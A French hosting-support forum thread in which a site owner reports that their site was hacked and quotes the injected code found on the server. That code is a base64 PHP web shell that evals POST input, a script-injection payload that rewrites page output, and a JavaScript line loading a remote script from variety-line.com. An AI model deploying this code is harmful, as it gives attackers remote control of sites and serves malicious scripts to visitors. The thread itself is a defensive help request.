piratage

[Aquarelle 0]

Mon site shopping 2.9 a été piraté sur OVH des fichiers index ont été modifié hier

heureusement je n'utilise pas la boutique juste une vitrine

[Gilles Boussin 0]

Bonjour Aquarelle;

Quelle était la nature des modifications apportées à vos fichiers?

Cordialement,

[Aquarelle 0]

Bonjour Aquarelle;

Quelle était la nature des modifications apportées à vos fichiers?

Cordialement,

Bonjour J Hervé

Dans les dossiers images j'ai trouvé un fichier gifimg.php qui contenait le code

<?php eval(base64_decode('aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpO2Vs

c2UgZGllKCc0MDQgTm90IEZvdW5kJyk7'));?>

Dans les fichiers JS le code

document.write('<script src=http://variety-line.com/_vti_bin/in_dex_.php ><\/script>');

Dans les index.php et index.html le code

<?php eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygnejRoM3cnKSl7ZnVuY3Rpb24gejRoM3coJHMpe2lmKHByZWdf

bWF0Y2hfYWxsKCcjPHNjcmlwdCguKj8pPC9zY3JpcHQ+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXWFzJ

HYpaWYoY291bnQoZXhwbG9kZSgiXG4iLCR2KSk+NSl7JGU9cHJlZ19tYXRjaCgnI1tcJyJdW15cc1wnIl

wuLDtcPyFcW1xdOi88PlwoXCldezMwLH0jJywkdil8fHByZWdfbWF0Y2goJyNbXChcW10oXHMqXGQrLCl

7MjAsfSMnLCR2KTtpZigocHJlZ19tYXRjaCgnI1xiZXZhbFxiIycsJHYpJiYoJGV8fHN0cnBvcygkdiwn

ZnJvbUNoYXJDb2RlJykpKXx8KCRlJiZzdHJwb3MoJHYsJ2RvY3VtZW50LndyaXRlJykpKSRzPXN0cl9yZ

XBsYWNlKCR2LCcnLCRzKTt9aWYocHJlZ19tYXRjaF9hbGwoJyM8aWZyYW1lIChbXj5dKj8pc3JjPVtcJy

JdPyhodHRwOik/Ly8oW14+XSo/KT4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdYXMkdilpZihwcmVnX21hdGNoKCcjW1wuIF13aWR0aFxz

Kj1ccypbXCciXT8wKlswLTldW1wnIj4gXXxkaXNwbGF5XHMqOlxzKm5vbmUjaScsJHYpJiYhc3Ryc3RyK

CR2LCc/Jy4nPicpKSRzPXByZWdfcmVwbGFjZSgnIycucHJlZ19xdW90ZSgkdiwnIycpLicuKj88L2lmcmFtZT4j

aXMnLCcnLCRzKTskcz1zdHJfcmVwbGFjZSgkYT1iYXNlNjRfZGVjb2RlKCdQSE5qY21sd2RDQnpjbU05Y

UhSMGNEb3ZMM1poY21sbGRIa3RiR2x1WlM1amIyMHZYM1owYVY5aWFXNHZhVzVmWkdWNFh5NXdhSEFnUG

p3dmMyTnlhWEIwUGc9PScpLCcnLCRzKTtpZihzdHJpc3RyKCRzLCc8Ym9keScpKSRzPXByZWdfcmVwbGF

jZSgnIyhccyo8Ym9keSkjbWknLCRhLidcMScsJHMsMSk7ZWxzZWlmKHN0cnBvcygkcywnPGEnKSkkcz0k

YS4kcztyZXR1cm4kczt9ZnVuY3Rpb24gejRoM3cyKCRhLCRiLCRjLCRkKXtnbG9iYWwkejRoM3cxOyRzP

WFycmF5KCk7aWYoZnVuY3Rpb25fZXhpc3RzKCR6NGgzdzEpKWNhbGxfdXNlcl9mdW5jKCR6NGgzdzEsJG

EsJGIsJGMsJGQpO2ZvcmVhY2goQG9iX2dldF9zdGF0dXMoMSlhcyR2KWlmKCgkYT0kdlsnbmFtZSddKT0

9J3o0aDN3JylyZXR1cm47ZWxzZWlmKCRhPT0nb2JfZ3poYW5kbGVyJylicmVhaztlbHNlJHNbXT1hcnJh

eSgkYT09J2RlZmF1bHQgb3V0cHV0IGhhbmRsZXInP2ZhbHNlOiRhKTtmb3IoJGk9Y291bnQoJHMpLTE7J

Gk+PTA7JGktLSl7JHNbJGldWzFdPW9iX2dldF9jb250ZW50cygpO29iX2VuZF9jbGVhbigpO31vYl9zdG

FydCgnejRoM3cnKTtmb3IoJGk9MDskaTxjb3VudCgkcyk7JGkrKyl7b2Jfc3RhcnQoJHNbJGldWzBdKTt

lY2hvICRzWyRpXVsxXTt9fX0kejRoM3dsPSgoJGE9QHNldF9lcnJvcl9oYW5kbGVyKCd6NGgzdzInKSkh

PSd6NGgzdzInKT8kYTowO2V2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpOw==')); ?>

Meme en mettant les fichiers modifiés en chmod 444, le lendemain ces fichiers étaient de nouveau en ecriture et modifié.J'ai modifié mes accés ftp et remis les fichiers en chmod 444 et pour l'instant je suis tranquille.

Je pense que j'ai été victime d'un trojan sur mon pc. Comment dérober mes accés FTP dans filezila? Maintenant j'efface l'historique après une connection FTP.

[Gilles Boussin 0]

Bonjour Aquarelle,

A priori je pencherais plus pour une attauqe direct du serveur qui vous héberge, que de votre poste de travail pour récupérer vos accès FTP.

Dans le cas où vous êtes hébergée sur un serveur mutualisé, vous êtes-vous renseignée auprés de votre hébergeur afin de savoir si d'autres sites hébergés sur le même serveur ont connu le même souci?

Cordialement,